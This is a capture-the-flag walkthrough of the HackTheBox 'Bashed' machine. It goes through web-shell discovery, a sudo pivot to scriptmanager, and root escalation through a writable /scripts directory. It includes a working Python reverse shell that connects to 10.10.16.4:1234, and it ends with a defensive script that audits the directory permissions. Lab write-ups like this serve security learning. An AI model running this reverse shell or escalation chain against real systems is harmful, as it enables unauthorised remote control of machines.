HackTheBox - Bashed

Morten Hansen • January 30, 2022

Bashed

IP: 10.10.10.68

Nmap

└─$ nmap -sV -sC -p- 10.10.10.68  
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Opening the site in a browser gives a development page that links to phpbash.php on GitHub. That is a hint that phpbash is deployed somewhere on the server.

Run dirbuster and fuzz for directories containing the file phpbash.php, using /{}/phpbash.php as the query pattern (the directory name is substituted for {}). The only result with response code 200 is http://10.10.10.68/dev/phpbash.php.

Opening that page gives us a web shell. We are running as www-data and can read user.txt in /home/arrexel.

Uploading a PHP reverse shell into the web root gives us a proper reverse shell; from there, sudo -u scriptmanager bash gives a responsive shell as scriptmanager.

sudo -l shows that we can run any command as scriptmanager. In / there is a directory called scripts that is owned by scriptmanager. We can't cd into it as www-data, but we can list its contents with sudo -u scriptmanager ls -la /scripts/ (without quotes around the command).

The content is:

drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Oct 11 12:27 test.txt

If we upload a Python reverse-shell script there, we get a reverse shell as root.

```python
import socket, subprocess, os

# connect back to the listener (attacker IP and port from the write-up)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.4", 1234))
# point stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# interactive shell over the connection
p = subprocess.call(["/bin/sh", "-i"])
```
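As an added, defender-side example (not part of the original write-up), the following Python parses the ls -la listing of /scripts shown above and flags the pattern it exposes: a directory and script writable by a non-root user sitting next to a root-owned file. The heuristic that root-owned output in such a directory signals a root process writing to, and by implication running scripts from, that directory is an assumption of this check; the listing is embedded as constructed sample input so it runs offline.

```python
import re

# Constructed sample input: the /scripts listing from this write-up.
LISTING = """\
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Oct 11 12:27 test.txt
"""

# type, 9 permission chars, links, owner, group, size, month, day, year-or-time, name
LS_LINE = re.compile(
    r"^([dl-])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)

def parse_ls(listing):
    """Turn 'ls -la' output into dicts; non-matching lines such as 'total N' are skipped."""
    entries = []
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if m:
            kind, mode, owner, group, name = m.groups()
            entries.append({"type": kind, "mode": mode, "owner": owner, "group": group, "name": name})
    return entries

def writable_by_nonroot(entry):
    """Owner write bit (owner not root), group write bit (group not root), or world write bit."""
    mode = entry["mode"]
    return ((entry["owner"] != "root" and mode[1] == "w")
            or (entry["group"] != "root" and mode[4] == "w")
            or mode[7] == "w")

def audit_script_dir(listing):
    """Flag a non-root-writable directory holding non-root-writable scripts next to root-owned
    files. Assumption (heuristic): root-owned files mean a root process writes here and is
    likely to execute the scripts, so a non-root user can get code run as root."""
    entries = parse_ls(listing)
    dot = next((e for e in entries if e["name"] == "."), None)
    if dot is None:
        return {"risk": False, "root_owned": [], "writable_scripts": []}
    root_owned = sorted(e["name"] for e in entries
                        if e["owner"] == "root" and e["name"] not in (".", ".."))
    writable_scripts = sorted(e["name"] for e in entries
                              if e["type"] == "-" and e["name"].endswith((".py", ".sh"))
                              and writable_by_nonroot(e))
    risk = writable_by_nonroot(dot) and bool(root_owned) and bool(writable_scripts)
    return {"risk": risk, "root_owned": root_owned, "writable_scripts": writable_scripts}
```

Running audit_script_dir(LISTING) on the write-up's listing reports risk=True with test.txt as the root-owned file and test.py as the script a non-root user can rewrite; fixing it means making /scripts and its scripts root-owned and not writable by others.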